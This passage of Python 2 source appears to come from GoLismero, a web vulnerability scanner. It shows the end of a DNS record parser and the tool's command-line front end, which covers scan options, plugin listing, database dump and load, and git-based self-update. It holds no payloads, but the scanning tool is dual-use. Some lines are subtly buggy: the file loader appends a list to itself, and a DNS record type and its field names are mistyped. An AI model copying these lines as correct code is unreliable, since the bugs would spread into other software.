answer.protocol)
elif register_type == "DS":
m_return = DnsRegisterDS(answer.algorithm,
dns.rdata._hexify(answer.digest),
answer.digest_type,
answer.key_tag)
elif register_type == "HINFO":
m_return = DnsRegisterHINFO(answer.cpu,
answer.os)
elif register_type == "IPSECKEY":
m_return = DnsRegisterIPSECKEY(answer.algorithm,
answer.gateway,
answer.gateway_type,
answer.key,
answer.precedence)
elif register_type == "ISDN":
m_return = DnsRegisterISDN(answer.address,
answer.subaddress)
elif register_type == "LOC":
m_return = DnsRegisterLOC(answer.latitude,
answer.longitude,
answer.altitude,
answer.to_text())
elif register_type == "MX":
m_return = DnsRegisterMX(answer.exchange.to_text()[:-1],
answer.preference)
elif register_type == "NAPTR":
m_return = DnsRegisterNAPTR(answer.order,
answer.preference,
answer.regexp,
answer.replacement.to_text()[:-1],
answer.service)
elif register_type == "NS":
m_return = DnsRegisterNS(answer.target.to_text()[:-1])
elif register_type == "NSAP":
m_return = DnsRegisterNSAP(answer.address)
elif register_type == "NSEC":
m_return = DnsRegisterNSEC(answer.next.to_text()[:-1])
elif register_type == "NSEC3":
m_return = DnsRegisterNSEC3(answer.algorithm,
answer.flags,
answer.iterations,
dns.rdata._hexify(answer.salt))
elif register_type == "NSEC3PARAM":
m_return = DnsRegisterNSEC3PARAM(answer.algorithm,
answer.flags,
answer.iterations,
dns.rdata._hexify(answer.salt))
elif register_type == "PTR":
m_return = DnsRegisterPTR(answer.target.to_text()[:-1])
elif register_type == "RP":
m_return = DnsRegisterRP(answer.mbox.to_text()[:-1],
answer.txt.to_text()[:-1])
elif register_type == "RPSIG":
m_return = DnsRegisterRRSIG(answer.algorithm,
answer.expiration,
answer.interception,
answer.key_tag,
answer.labels,
answer.original_ttl,
answer.signer,
answer.type_coverded)
elif register_type == "SIG":
m_return = DnsRegisterSIG(answer.algorithm,
answer.expiration,
answer.interception,
answer.key_tag,
answer.labels,
answer.original_ttl,
answer.signer,
answer.type_coverded)
elif register_type == "SOA":
m_return = DnsRegisterSOA(answer.mname.to_text()[:-1],
answer.rname.to_text()[:-1],
answer.refresh,
answer.expire)
elif register_type == "SPF":
m_return = DnsRegisterSPF(answer.strings)
elif register_type == "SRV":
m_return = DnsRegisterSRV(answer.target.to_text()[:-1],
answer.priority,
answer.weight,
answer.port)
elif register_type == "TXT":
m_return = DnsRegisterTXT(answer.strings)
elif register_type == "WKS":
m_return = DnsRegisterWKS(answer.address,
answer.protocol,
answer.bitmap)
elif register_type == "X25":
m_return = DnsRegisterX25(answer.address)
else:
raise ValueError("DNS register type '%s' is incorrect." % register_type)
return m_return
#--------------------------------------------------------------------------
def _make_request(self, register_type, host, nameservers=None, auto_resolve=True):
"""
Make a request using dnslib, and return a DNS register.
:param: register_type: Type of query: A, AAAA, CNAME...
:type register_type: str
:param host: Target host for the request.
:type host: str
:param nameservers: Custom name servers.
:type nameservers: list(str)
:param auto_resolve: configure this function to transform de dnslib register to the golismero register.
:type auto_resolve: bool
:return: a list with the DnsRegisters. Returned list can be empty, if a error has occurred.
:type: list(DnsRegister)
"""
if not isinstance(register_type, basestring):
raise TypeError("Expected str, got '%s'" % type(type))
if not isinstance(host, basestring):
raise TypeError("Expected basestring, got '%s'" % type(host))
if nameservers:
if isinstance(nameservers, list):
for n in nameservers:
if not isinstance(n, basestring):
raise TypeError("Expected basestring, got '%s'" % type(n))
else:
raise TypeError("Expected list, got '%s'" % type(nameservers))
m_query_obj = None
if nameservers:
m_query_obj = dns.resolver.Resolver(configure=False)
m_query_obj.nameservers = nameservers
else:
m_query_obj = dns.resolver.Resolver(configure=True)
# Append the free public DNS servers for avoid errors when the DNS servers
# configured in /etc/resolv.conf fails.
m_query_obj.nameservers.extend(self.PUBLIC_NAMESERVERS)
# Set timeouts
m_query_obj.timeout = self.REQUEST_TIMEOUT
m_query_obj.lifetime = self.REQUEST_TIMEOUT
try:
answer = m_query_obj.query(host, register_type)
except Exception:
return []
if auto_resolve:
return self._dnslib2register(register_type, answer)
else:
return answer
# Instance the singleton.
DNS = _DNS()
```
#### File: Dangerous/Golismero/golismero.py
```python
GoLismero 2.0 - The web knife.
Golismero project site: https://github.com/golismero
Golismero project mail: <EMAIL>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
__all__ = []
#------------------------------------------------------------------------------
# Fix the module load path.
import sys
from os import path
script = __file__
if path.islink(script):
script = path.realpath(script)
here = path.split(path.abspath(script))[0]
assert here
thirdparty_libs = path.join(here, "thirdparty_libs")
assert path.exists(thirdparty_libs)
has_here = here in sys.path
has_thirdparty_libs = thirdparty_libs in sys.path
if not (has_here and has_thirdparty_libs):
if has_here:
sys.path.remove(here)
if has_thirdparty_libs:
sys.path.remove(thirdparty_libs)
sys.path.insert(0, thirdparty_libs)
sys.path.insert(0, here)
#------------------------------------------------------------------------------
# Python version check.
# We must do it now before trying to import any more modules.
#
# Note: this is mostly because of argparse, if you install it
# separately you can try removing this check and seeing
# what happens (we haven't tested it!).
from golismero import show_banner
from sys import version_info, exit
if __name__ == "__main__":
if version_info < (2, 7) or version_info >= (3, 0):
show_banner()
print "[!] You must use Python version 2.7"
exit(1)
# In OS X, python versions lower than 2.7.6 fails
import platform
if (
platform.system() == "Darwin" and
(version_info < (2,7,6) or version_info >= (3,0))
):
show_banner()
print (
"[!] OS X can experiment some problems with Python versions lower than 2.7.6. It's recommended to upgrade"
" http://www.python.org/download/releases/2.7.6/"
)
#------------------------------------------------------------------------------
# Imported modules
import argparse
import os
import sys
from ConfigParser import RawConfigParser
from getpass import getpass
from glob import glob
from os import getenv, getpid
from thread import get_ident
from traceback import format_exc
# Hack to disable logging in SnakeMQ.
import snakemq
if path.sep == "\\":
snakemq.init_logging(open("nul", "w"))
else:
snakemq.init_logging(open("/dev/null", "w"))
#------------------------------------------------------------------------------
# GoLismero modules
from golismero.api.config import Config
from golismero.api.external import run_external_tool
from golismero.api.logger import Logger
from golismero.api.plugin import CATEGORIES, STAGES
from golismero.common import OrchestratorConfig, AuditConfig, get_profile, \
get_available_profiles, get_default_plugins_folder
from golismero.main import launcher
from golismero.main.console import get_terminal_size, colorize, Console
from golismero.main.testing import PluginTester
from golismero.managers.pluginmanager import PluginManager
from golismero.managers.processmanager import PluginContext
#------------------------------------------------------------------------------
# Custom argparse actions
class ArgumentParserWithBanner(argparse.ArgumentParser):
must_show_banner = True
def error(self, message):
if self.must_show_banner:
self.must_show_banner = False
show_banner()
self.usage = None
message += "\n\nUse -h to see the quick help, or --help to show the full help text."
return super(ArgumentParserWithBanner, self).error(message)
# --enable-plugin
class EnablePluginAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
parsed = [ (True, x.strip()) for x in values.split(",")]
overrides = getattr(namespace, self.dest, [])
overrides.extend(parsed)
setattr(namespace, self.dest, overrides)
# --disable-plugin
class DisablePluginAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
parsed = [ (False, x.strip()) for x in values.split(",")]
overrides = getattr(namespace, self.dest, [])
overrides.extend(parsed)
setattr(namespace, self.dest, overrides)
# --file
class LoadListFromFileAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
try:
with open(values, "rU") as f:
tokens = []
for line in f:
line = line.strip()
if not line or line[0] == "#":
continue
tokens.append(tokens)
except Exception:
parser.error("Error reading file: %s" % values)
setattr(namespace, self.dest, tokens)
# --cookie-file
class ReadValueFromFileAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
try:
with open(values, "rU") as f:
data = f.read()
except IOError, e:
parser.error("Can't read file %r. Error: %s" % (values, str(e)))
setattr(namespace, self.dest, data)
# --plugin-arg
class SetPluginArgumentAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
d = getattr(namespace, self.dest, None)
if d is None:
d = []
setattr(namespace, self.dest, d)
try:
plugin_id, token = values.split(":", 1)
plugin_id = plugin_id.strip()
key, value = token.split("=", 1)
key = key.strip()
value = value.strip()
assert plugin_id
assert key
d.append( (plugin_id, key, value) )
except Exception:
parser.error("invalid plugin argument: %s" % values)
# -h
class QuickHelpAction(argparse._HelpAction):
def __call__(self, parser, namespace, values, option_string=None):
if parser.must_show_banner:
parser.must_show_banner = False
show_banner()
parser._print_message(parser.quick_help)
parser.exit()
#------------------------------------------------------------------------------
# Command line parser using argparse.
COMMANDS = (
# Scanning.
"SCAN",
"RESCAN",
"REPORT",
"IMPORT",
# Information.
"PROFILES",
"PLUGINS",
"INFO",
# Management.
"LOAD",
"DUMP",
"UPDATE",
)
def cmdline_parser():
# Fix the console width bug in argparse.
try:
os.environ["COLUMNS"] = str(get_terminal_size()[0])
except Exception:
pass
# Use Bash autocompletion when available.
try:
from argcomplete import autocomplete
from argcomplete.completers import ChoicesCompleter, FilesCompleter
autocomplete_enabled = True
except ImportError:
autocomplete_enabled = False
if autocomplete_enabled:
def profiles_completer(prefix, **kwargs):
return [
v for v in get_available_profiles()
if v.startswith(prefix)
]
def plugins_completer(prefix, **kwargs):
if ":" in prefix:
return [prefix,]
names = []
base = get_default_plugins_folder()
for cat in CATEGORIES:
for (_, _, filenames) in os.walk(path.join(base, cat)):
for filename in filenames:
if filename.startswith(prefix):
name, ext = path.splitext(filename)
if ext.lower() == ".golismero":
names.append(name)
return names
parser = ArgumentParserWithBanner(fromfile_prefix_chars="@", add_help=False)
cmd = parser.add_argument("command", metavar="COMMAND", help="action to perform")
if autocomplete_enabled:
cmd.completer = ChoicesCompleter(COMMANDS + tuple(x.lower() for x in COMMANDS))
parser.add_argument("targets", metavar="TARGET", nargs="*", help="zero or more arguments, meaning depends on command")
parser.add_argument("-h", action=QuickHelpAction, default=argparse.SUPPRESS, help="show this help message and exit")
parser.add_argument("--help", action='help', default=argparse.SUPPRESS, help="show this help message and exit")
gr_main = parser.add_argument_group("main options")
cmd = gr_main.add_argument("-f", "--file", metavar="FILE", action=LoadListFromFileAction, help="load a list of targets from a plain text file")
if autocomplete_enabled:
cmd.completer = FilesCompleter(directories=False)
cmd = gr_main.add_argument("--config", metavar="FILE", help="global configuration file")
if autocomplete_enabled:
cmd.completer = FilesCompleter(allowednames=(".conf",), directories=False)
cmd = gr_main.add_argument("--user-config", metavar="FILE", help="per-user configuration file")
if autocomplete_enabled:
cmd.completer = FilesCompleter(allowednames=(".conf",), directories=False)
cmd = gr_main.add_argument("-p", "--profile", metavar="NAME", help="profile to use")
if autocomplete_enabled:
cmd.completer = profiles_completer
cmd = gr_main.add_argument("--ui-mode", metavar="MODE", help="UI mode")
if autocomplete_enabled:
cmd.completer = ChoicesCompleter(("console", "disabled")) ##, "web"))
gr_main.add_argument("-v", "--verbose", action="count", help="increase output verbosity")
gr_main.add_argument("-q", "--quiet", action="store_const", dest="verbose", const=0, help="suppress text output")
gr_main.add_argument("--color", action="store_true", default=None, dest="color", help="use colors in console output")
gr_main.add_argument("--no-color", action="store_false", default=None, dest="color", help="suppress colors in console output")
gr_audit = parser.add_argument_group("audit options")
gr_audit.add_argument("--audit-name", metavar="NAME", help="customize the audit name")
cmd = gr_audit.add_argument("-db", "--audit-db", metavar="DATABASE", dest="audit_db", help="specify a database filename")
if autocomplete_enabled:
cmd.completer = FilesCompleter(allowednames=(".db",), directories=False)
gr_audit.add_argument("-nd", "--no-db", dest="audit_db", action="store_const", const=":memory:", help="do not store the results in a database")
cmd = gr_audit.add_argument("-i", "--input", dest="imports", metavar="FILENAME", action="append", help="read results from external tools right before the audit")
if autocomplete_enabled:
cmd.completer = FilesCompleter(allowednames=(".csv", ".xml", ".nessus"), directories=False)
gr_audit.add_argument("-ni", "--no-input", dest="disable_importing", action="store_true", default=False, help="do not read results from external tools")
gr_report = parser.add_argument_group("report options")
cmd = gr_report.add_argument("-o", "--output", dest="reports", metavar="FILENAME", action="append", help="write the results of the audit to this file (use - for stdout)")
if autocomplete_enabled:
cmd.completer = FilesCompleter(allowednames=(".html", ".rst", ".txt"), directories=False)
gr_report.add_argument("-no", "--no-output", dest="disable_reporting", action="store_true", default=False, help="do not output the results")
gr_report.add_argument("--full", action="store_false", default=None, dest="only_vulns", help="produce fully detailed reports")
gr_report.add_argument("--brief", action="store_true", dest="only_vulns", help="report only the highlights")
gr_net = parser.add_argument_group("network options")
gr_net.add_argument("--allow-subdomains", action="store_true", default=None, dest="include_subdomains", help="include subdomains in the target scope")
gr_net.add_argument("--forbid-subdomains", action="store_false", default=None, dest="include_subdomains", help="do not include subdomains in the target scope")
gr_net.add_argument("--parent", action="store_true", default=None, dest="allow_parent", help="include parent folders in the target scope")
gr_net.add_argument("-np", "--no-parent", action="store_false", default=None, dest="allow_parent", help="do not include parent folders in the target scope")
cmd = gr_net.add_argument("-r", "--depth", help="maximum spidering depth (use \"infinite\" for no limit)")
if autocomplete_enabled:
cmd.completer = ChoicesCompleter(("1", "200", "infinite",))
gr_net.add_argument("--follow-redirects", action="store_true", default=None, dest="follow_redirects", help="follow redirects")
gr_net.add_argument("--no-follow-redirects", action="store_false", default=None, dest="follow_redirects", help="do not follow redirects")
gr_net.add_argument("--follow-first", action="store_true", default=None, dest="follow_first_redirect", help="always follow a redirection on the target URL itself")
gr_net.add_argument("--no-follow-first", action="store_false", default=None, dest="follow_first_redirect", help="don't treat a redirection on a target URL as a special case")
gr_net.add_argument("--max-connections", help="maximum number of concurrent connections per host")
gr_net.add_argument("-l", "--max-links", type=int, default=None, help="maximum number of links to analyze (0 => infinite)")
gr_net.add_argument("-pu","--proxy-user", metavar="USER", help="HTTP proxy username")
gr_net.add_argument("-pp","--proxy-pass", metavar="PASS", help="HTTP proxy password")
gr_net.add_argument("-pa","--proxy-addr", metavar="ADDRESS", help="HTTP proxy address")
gr_net.add_argument("-pn","--proxy-port", metavar="PORT", help="HTTP proxy port number")
gr_net.add_argument("--cookie", metavar="COOKIE", help="set cookie for requests")
gr_net.add_argument("--user-agent", metavar="USER_AGENT", help="set a custom user agent or 'random' value")
cmd = gr_net.add_argument("--cookie-file", metavar="FILE", action=ReadValueFromFileAction, dest="cookie", help="load a cookie from file")
if autocomplete_enabled:
cmd.completer = FilesCompleter(directories=False)
gr_net.add_argument("--persistent-cache", action="store_true", dest="use_cache_db", default=True, help="use a persistent network cache [default]")
gr_net.add_argument("--volatile-cache", action="store_false", dest="use_cache_db", help="use a volatile network cache")
gr_plugins = parser.add_argument_group("plugin options")
cmd = gr_plugins.add_argument("-a", "--plugin-arg", metavar="PLUGIN:KEY=VALUE", action=SetPluginArgumentAction, dest="raw_plugin_args", help="pass an argument to a plugin")
if autocomplete_enabled:
cmd.completer = plugins_completer
cmd = gr_plugins.add_argument("-e", "--enable-plugin", metavar="PLUGIN", action=EnablePluginAction, default=[], dest="plugin_load_overrides", help="enable a plugin")
if autocomplete_enabled:
cmd.completer = plugins_completer
cmd = gr_plugins.add_argument("-d", "--disable-plugin", metavar="PLUGIN", action=DisablePluginAction, dest="plugin_load_overrides", help="disable a plugin")
if autocomplete_enabled:
cmd.completer = plugins_completer
gr_plugins.add_argument("--max-concurrent", metavar="N", type=int, default=None, help="maximum number of plugins to run concurrently")
gr_plugins.add_argument("--plugin-timeout", metavar="N", type=float, default=None, help="timeout in seconds for the execution of a plugin")
cmd = gr_plugins.add_argument("--plugins-folder", metavar="PATH", help="customize the location of the plugins" )
if autocomplete_enabled:
cmd.completer = FilesCompleter(directories=True)
if autocomplete_enabled:
autocomplete(parser)
quick_help = (
################################################################################
"\n"
" SCAN:\n"
" Perform a vulnerability scan on the given targets. Optionally import\n"
" results from other tools and write a report. The arguments that follow may\n"
" be domain names, IP addresses or web pages.\n"
"\n"
" RESCAN:\n"
" Same as SCAN, but previously run tests are repeated. If the database is\n"
" new, this command is identical to SCAN.\n"
"\n"
" PROFILES:\n"
" Show a list of available config profiles. This command takes no arguments.\n"
"\n"
" PLUGINS:\n"
" Show a list of available plugins. This command takes no arguments.\n"
"\n"
" INFO:\n"
" Show detailed information on a given plugin. The arguments that follow are\n"
" the plugin IDs. You can use glob-style wildcards.\n"
"\n"
" REPORT:\n"
" Write a report from an earlier scan. This command takes no arguments.\n"
" To specify output files use the -o switch.\n"
"\n"
" IMPORT:\n"
" Import results from other tools and optionally write a report, but don't\n"
" scan the targets. This command takes no arguments. To specify input files\n"
" use the -i switch.\n"
"\n"
" DUMP:\n"
" Dump the database from an earlier scan in SQL format. This command takes no\n"
" arguments. To specify output files use the -o switch.\n"
"\n"
" LOAD:\n"
" Load a database dump from an earlier scan in SQL format. This command takes\n"
" no arguments. To specify input files use the -i switch.\n"
"\n"
" UPDATE:\n"
" Update GoLismero to the latest version. Requires Git to be installed and\n"
" available in the PATH. This command takes no arguments.\n"
"\n"
"examples:\n"
"\n"
" scan a website and show the results on screen:\n"
" %(prog)s scan http://www.example.com\n"
"\n"
" grab Nmap results, scan all hosts found and write an HTML report:\n"
" %(prog)s scan -i nmap_output.xml -o report.html\n"
"\n"
" grab results from OpenVAS and show them on screen, but don't scan anything:\n"
" %(prog)s import -i openvas_output.xml\n"
"\n"
" show a list of all available configuration profiles:\n"
" %(prog)s profiles\n"
"\n"
" show a list of all available plugins:\n"
" %(prog)s plugins\n"
"\n"
" show information on all bruteforcer plugins:\n"
" %(prog)s info brute_*\n"
"\n"
" dump the database from a previous scan:\n"
" %(prog)s dump -db example.db -o dump.sql\n"
"\n"
################################################################################
)
parser.usage = parser.format_usage()[7:] + \
"\navailable commands:\n" + quick_help
parser.quick_help = (
"usage: %(prog)s COMMAND [TARGETS...] [--options]\n" \
+ quick_help) % {"prog": parser.prog}
return parser
#------------------------------------------------------------------------------
def parse_plugin_args(manager, plugin_args):
"""
Parse a list of tuples with plugin arguments as a dictionary of
dictionaries, with plugin IDs sanitized.
:param manager: Plugin manager.
:type manager: PluginManager
:param plugin_args: Arguments as specified in the command line.
:type plugin_args: list(tuple(str, str, str))
:returns: Sanitized plugin arguments. Dictionary mapping plugin
names to dictionaries mapping argument names and values.
:rtype: dict(str -> dict(str -> str))
:raises KeyError: Plugin or argument not found.
"""
parsed = {}
for plugin_id, key, value in plugin_args:
plugin_info = manager.guess_plugin_by_id(plugin_id)
if not plugin_info:
raise KeyError("Plugin not found: %s" % plugin_id)
key = key.lower()
if key not in plugin_info.plugin_args:
raise KeyError(
"Argument not found: %s:%s" % (plugin_id, key))
try:
target = parsed[plugin_info.plugin_id]
except KeyError:
parsed[plugin_info.plugin_id] = target = {}
target[key] = value
return parsed
#------------------------------------------------------------------------------
def build_config_from_cmdline():
# Get the command line parser.
parser = cmdline_parser()
# Parse the command line options.
try:
args = sys.argv[1:]
envcfg = getenv("GOLISMERO_SETTINGS")
if envcfg:
args = parser.convert_arg_line_to_args(envcfg) + args
P, V = parser.parse_known_args(args)
if P.targets:
P.targets += V
else:
P.targets = V
P.plugin_args = {}
command = P.command.upper()
if command in COMMANDS:
P.command = command
if command == "RESCAN":
P.command = "SCAN"
P.redo = True
else:
P.redo = False
else:
P.targets.insert(0, P.command)
P.command = "SCAN"
# Load the Orchestrator options.
cmdParams = OrchestratorConfig()
cmdParams.command = P.command
if P.config:
cmdParams.config_file = path.abspath(P.config)
if not path.isfile(cmdParams.config_file):
raise ValueError("File not found: %s" % cmdParams.config_file)
if cmdParams.config_file:
cmdParams.from_config_file(cmdParams.config_file,
allow_profile = True)
if P.user_config:
cmdParams.user_config_file = path.abspath(P.user_config)
if not path.isfile(cmdParams.user_config_file):
raise ValueError(
"File not found: %s" % cmdParams.user_config_file)
if cmdParams.user_config_file:
cmdParams.from_config_file(cmdParams.user_config_file,
allow_profile = True)
if P.profile:
cmdParams.profile = P.profile
cmdParams.profile_file = get_profile(cmdParams.profile)
if cmdParams.profile_file:
cmdParams.from_config_file(cmdParams.profile_file)
cmdParams.from_object(P)
cmdParams.plugin_load_overrides = P.plugin_load_overrides
# Enable console colors if requested.
Console.use_colors = cmdParams.color
# Show the program banner.
parser.must_show_banner = False
if cmdParams.verbose:
show_banner()
# Load the target audit options.
auditParams = AuditConfig()
auditParams.profile = cmdParams.profile
auditParams.profile_file = cmdParams.profile_file
auditParams.config_file = cmdParams.config_file
auditParams.user_config_file = cmdParams.user_config_file
if auditParams.config_file:
auditParams.from_config_file(auditParams.config_file)
if auditParams.user_config_file:
auditParams.from_config_file(auditParams.user_config_file)
if auditParams.profile_file:
auditParams.from_config_file(auditParams.profile_file)
auditParams.from_object(P)
auditParams.plugin_load_overrides = P.plugin_load_overrides
# If importing is turned off, remove the list of imports.
# FIXME this should be done by argparse in argument order!
if P.disable_importing:
auditParams.imports = []
# If reports are turned off, remove the list of reports.
# Otherwise, if no reports are specified, default to screen report.
# FIXME this should be done by argparse in argument order!
if P.disable_reporting:
auditParams.reports = []
elif (
not auditParams.reports and
(P.command != "REPORT" or not auditParams.targets)
):
auditParams.reports = ["-"]
if auditParams.only_vulns is None:
auditParams.only_vulns = True
# Show exceptions as command line parsing errors.
except Exception, e:
##raise # XXX DEBUG
parser.error("arguments error: %s" % str(e))
# Get the plugins folder from the parameters.
# If no plugins folder is given, use the default.
plugins_folder = cmdParams.plugins_folder
if not plugins_folder:
plugins_folder = path.abspath(script)
plugins_folder = path.dirname(plugins_folder)
plugins_folder = path.join(plugins_folder, "plugins")
if not path.isdir(plugins_folder):
from golismero import common
plugins_folder = path.abspath(common.__file__)
plugins_folder = path.dirname(plugins_folder)
plugins_folder = path.join(plugins_folder, "plugins")
if not path.isdir(plugins_folder):
parser.error("Default plugins folder not found, aborting!")
cmdParams.plugins_folder = plugins_folder
# Return the parser, options, and config objects.
return parser, P, cmdParams, auditParams
#------------------------------------------------------------------------------
# Start of program.
def main():
# Command implementations.
command = {
"PLUGINS": command_plugins, # List plugins and quit.
"INFO": command_info, # Display plugin info and quit.
"PROFILES": command_profiles, # List profiles and quit.
"DUMP": command_dump, # Dump the database and quit.
"LOAD": command_load, # Load a database dump and quit.
"UPDATE": command_update, # Update GoLismero and quit.
}
# Parse the command line.
parser, P, cmdParams, auditParams = build_config_from_cmdline()
# Get the command implementation.
implementation = command.get(P.command, command_run)
# Run the command.
implementation(parser, P, cmdParams, auditParams)
#------------------------------------------------------------------------------
def command_plugins(parser, P, cmdParams, auditParams):
# Fail if we have arguments.
if P.targets:
parser.error("too many arguments")
# Load the plugins list.
try:
manager = PluginManager()
manager.find_plugins(cmdParams)
except Exception, e:
parser.error("error loading plugins list: %s" % str(e))
# Show the list of plugins.
print colorize("-------------", "red")
print colorize(" Plugin list", "red")
print colorize("-------------", "red")
# Import plugins...
import_plugins = manager.get_plugins("import")
if import_plugins:
print
print colorize("-= Import plugins =-", "yellow")
for name in sorted(import_plugins.keys()):
info = import_plugins[name]
print "\n%s:\n %s" % \
(colorize(name[7:], "cyan"), info.description)
# Testing plugins...
testing_plugins = manager.get_plugins("testing")
if testing_plugins:
names = sorted(testing_plugins.keys())
names = [x[8:] for x in names]
stages = [ (v,k) for (k,v) in STAGES.iteritems() ]
stages.sort()
for _, stage in stages:
s = stage + "/"
p = len(s)
s_slice = [x[p:] for x in names if x.startswith(s)]
if s_slice:
print
print colorize("-= %s plugins =-" % stage.title(), "yellow")
for name in s_slice:
info = testing_plugins["testing/%s/%s" % (stage, name)]
desc = info.description.strip()
desc = desc.replace("\n", "\n ")
print "\n%s:\n %s" % (colorize(name, "cyan"), desc)
# Report plugins...
report_plugins = manager.get_plugins("report")
if report_plugins:
print
print colorize("-= Report plugins =-", "yellow")
for name in sorted(report_plugins.keys()):
info = report_plugins[name]
desc = info.description.strip()
desc = desc.replace("\n", "\n ")
print "\n%s:\n %s" % (colorize(name[7:], "cyan"), desc)
# UI plugins...
ui_plugins = manager.get_plugins("ui")
if ui_plugins:
print
print colorize("-= UI plugins =-", "yellow")
for name in sorted(ui_plugins.keys()):
info = ui_plugins[name]
desc = info.description.strip()
desc = desc.replace("\n", "\n ")
print "\n%s:\n %s" % (colorize(name[3:], "cyan"), desc)
if path.sep == "/":
print
exit(0)
#------------------------------------------------------------------------------
def command_info(parser, P, cmdParams, auditParams):
# Fail if we don't have arguments.
if not P.targets:
parser.error("too few arguments")
# Load the plugins list.
try:
manager = PluginManager()
manager.find_plugins(cmdParams)
except Exception, e:
parser.error("error loading plugins list: %s" % str(e))
# Show the plugin information.
try:
to_print = []
plugin_infos = []
for plugin_id in P.targets:
m_found = manager.search_plugins_by_mask(plugin_id)
plugin_infos.extend( m_found.values() )
if not plugin_infos:
raise KeyError()
for info in plugin_infos:
Config._context = PluginContext(
address = None,
msg_queue = None,
orchestrator_pid = getpid(),
orchestrator_tid = get_ident(),
plugin_info = info
)
try:
manager.load_plugin_by_id(info.plugin_id)
except Exception:
pass
m_root = cmdParams.plugins_folder
m_root = path.abspath(m_root)
if not m_root.endswith(path.sep):
m_root += path.sep
m_location = info.descriptor_file[len(m_root):]
a, b = path.split(m_location)
b = colorize(b, "cyan")
m_location = path.join(a, b)
m_src = info.plugin_module[len(m_root):]
a, b = path.split(m_src)
b = colorize(b, "cyan")
m_src = path.join(a, b)
m_name = info.plugin_id
p = m_name.rfind("/") + 1
m_name = m_name[:p] + colorize(m_name[p:], "cyan")
m_desc = info.description.strip()
m_desc = m_desc.replace("\n", "\n ")
to_print.append("")
to_print.append("Information for plugin: %s" %
colorize(info.display_name, "yellow"))
to_print.append("-" * len("Information for plugin: %s" %
info.display_name))
to_print.append("%s %s" %
(colorize("ID:", "green"), m_name))
to_print.append("%s %s" %
(colorize("Location:", "green"), m_location))
to_print.append("%s %s" %
(colorize("Source code:", "green"), m_src))
if info.plugin_class:
to_print.append("%s %s" %
(colorize("Class name:", "green"),
colorize(info.plugin_class, "cyan")))
to_print.append("%s %s" %
(colorize("Category:", "green"), info.category))
to_print.append("%s %s" %
(colorize("Stage:", "green"), info.stage))
if info.description != info.display_name:
to_print.append("")
to_print.append("%s\n %s" %
(colorize("Description:", "green"), m_desc))
if info.plugin_args:
to_print.append("")
to_print.append(colorize("Arguments:", "green"))
for name, default in sorted(info.plugin_args.iteritems()):
if name in info.plugin_passwd_args:
default = "****************"
to_print.append("\t%s -> %s" %
(colorize(name, "cyan"), default))
to_print.append("")
except KeyError:
##raise # XXX DEBUG
parser.error("plugin ID not found")
except ValueError:
##raise # XXX DEBUG
parser.error("plugin ID not found")
except Exception, e:
##raise # XXX DEBUG
parser.error("error recovering plugin info: %s" % str(e))
for line in to_print:
print line
exit(0)
#------------------------------------------------------------------------------
def command_profiles(parser, P, cmdParams, auditParams):
if P.targets:
parser.error("too many arguments")
profiles = sorted(get_available_profiles())
if not profiles:
print "No available profiles!"
else:
print "--------------------"
print " " + colorize("Available profiles", "yellow")
print "--------------------"
print
for name in profiles:
try:
p = RawConfigParser()
p.read(get_profile(name))
desc = p.get("golismero", "description")
except Exception:
desc = None
if desc:
print "+ %s: %s" % (colorize(name, "cyan"), desc)
else:
print "+ %s" % colorize(name, "cyan")
if path.sep == "/":
print
exit(0)
#------------------------------------------------------------------------------
def command_dump(parser, P, cmdParams, auditParams):
if auditParams.is_new_audit():
parser.error("missing audit database")
if not P.reports:
parser.error("missing output filename")
if P.verbose != 0:
print "Loading database: %s" % \
colorize(auditParams.audit_db, "yellow")
import sqlite3
for filename in P.reports:
if P.verbose != 0:
print "Dumping to file: %s" % colorize(filename, "cyan")
db = sqlite3.connect(auditParams.audit_db)
try:
with open(filename, 'w') as f:
for line in db.iterdump():
f.write(line + "\n")
finally:
db.close()
exit(0)
#------------------------------------------------------------------------------
def command_load(parser, P, cmdParams, auditParams):
if not auditParams.is_new_audit():
parser.error("audit database already exists")
if not P.imports:
parser.error("missing input filename")
if len(P.imports) > 1:
parser.error("only one input filename allowed")
import sqlite3
filename = P.imports[0]
if P.verbose != 0:
print "Loading from file: %s" % colorize(filename, "cyan")
with open(filename, 'rU') as f:
data = f.read()
if P.verbose != 0:
print "Creating database: %s" % \
colorize(auditParams.audit_db, "yellow")
db = sqlite3.connect(auditParams.audit_db)
try:
try:
cursor = db.cursor()
try:
cursor.executescript(data)
del data
db.commit()
finally:
cursor.close()
finally:
db.close()
except:
parser.error("error loading database dump: " + str(sys.exc_value))
exit(0)
#------------------------------------------------------------------------------
def command_update(parser, P, cmdParams, auditParams):
# Fail if we got any arguments.
if P.targets:
parser.error("too many arguments")
# Setup a dummy environment so we can call the API.
with PluginTester(autoinit=False) as t:
t.orchestrator_config.ui_mode = "console"
t.orchestrator_config.verbose = cmdParams.verbose
t.orchestrator_config.color = cmdParams.color
t.init_environment(mock_audit=False)
# Flag to tell if we fetched new code.
did_update = False
# Run Git here to download the latest version.
if cmdParams.verbose:
Logger.log("Updating GoLismero...")
if os.path.exists(os.path.join(here, ".git")):
helper = _GitHelper(cmdParams.verbose)
run_external_tool("git", ["pull"], cwd = here, callback = helper)
did_update = helper.did_update
elif cmdParams.verbose:
Logger.log_error(
"Cannot update GoLismero if installed from a zip file! You"
" must install it from the Git repository to get updates.")
# Update the TLD names.
if cmdParams.verbose:
Logger.log("Updating list of TLD names...")
import tldextract
tldextract.TLDExtract().update(True)
# If no code was updated, just quit here.
if not did_update:
if cmdParams.verbose:
Logger.log("Update complete.")
exit(0)
# Tell the user we're about to restart.
if cmdParams.verbose:
Logger.log("Reloading GoLismero...")
# Unload GoLismero.
import golismero.patches.mp
golismero.patches.mp.undo()
x = here
if not x.endswith(os.path.sep):
x += os.path.sep
our_modules = {
n: m for n, m in sys.modules.iteritems()
if n.startswith("golismero.") or (
